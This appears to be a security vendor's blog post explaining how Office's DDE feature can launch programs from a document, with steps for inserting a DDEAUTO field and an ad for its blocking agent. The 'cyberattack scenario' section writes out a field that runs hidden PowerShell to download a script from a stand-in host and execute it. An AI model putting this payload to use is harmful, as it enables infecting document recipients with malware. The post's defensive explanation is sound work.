DDE Attacks, a new way to spread malwares using a Microsoft feature

The Dynamic Data Exchange protocol (DDE) is a built-in Microsoft feature that permits to share and exchange data between applications. This feature can be used in Microsoft Office programs to request data from another application.
For malicious purpose, this feature allows an attacker to craft a document to perform malicious actions without any exploit or macro.

This attack method has been reported to Microsoft, and Microsoft responded that as suggested it is a feature and no further action will be taken, and will be considered for a next-version candidate bug.

Simple DDE implementation

In Insert tab, click on “Quick Parts” and “Field”.

DDE Attack, insert quick parts

Click Ok to create a new Formula.

DDE attack, create forumle

Right click on the new formula and choose Toggle Field Codes.

DDE attack, edit formule

Then write the DDE command, in this example only calc.exe will be executed.

{ DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }

DDE attack, formule calc.exe

Then save the document, and open it.

When the document is opened, a pop-up is displayed to inform the user that external files might be loaded by the document.

DDE attack, pop-up external file

If the user clicks Yes, a new pop-up is displayed to inform the user that cmd.exe will be executed.

DDE attack, pop-up cmd.exe

If the user clicks Yes, calc.exe is started. A pop-up says that no data can be retrieved because the program doesn’t return data to the DDE protocol.

DDE attack, calc.exe

Cyberattack scenario

To understand how this infection method is critical, let’s see a real attack execution flow.
For this example, the DDE starts a powershell command line using the DDE method, powershell will download a program on a server and execute it:

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://example.com/my_malware.ps1');powershell -e $e "}

When the document is openened, the user still need to accept two pop-ups to start the attack. Then the powershell command line is executed and starts downloading the file on the server hosting the final malware. The malware is executed by powershell, if Word or powershell is closed the malware keeps running in the background.

Here is the execution tree of the different processes:

DDE attack, powershell execution

This attack can also be done in Outlook, Excel, XML files etc..
For more attack examples, check this link: https://twitter.com/i/moments/918126999738175489.

How SAFE Agent blocks DDE attacks

Like a lot of Office based attacks (macro, exploit, link to a program …), this attack needs to execute an external program to infect the computer.
In order to block this type of attack, the SAFE Agent limits the access to external programs for all Office applications.

SAFE blocks DDE attacks

When Microsoft Word tries to start cmd.exe from the DDE command, the Agent denies the execution and the DDE attack is sucessfully blocked.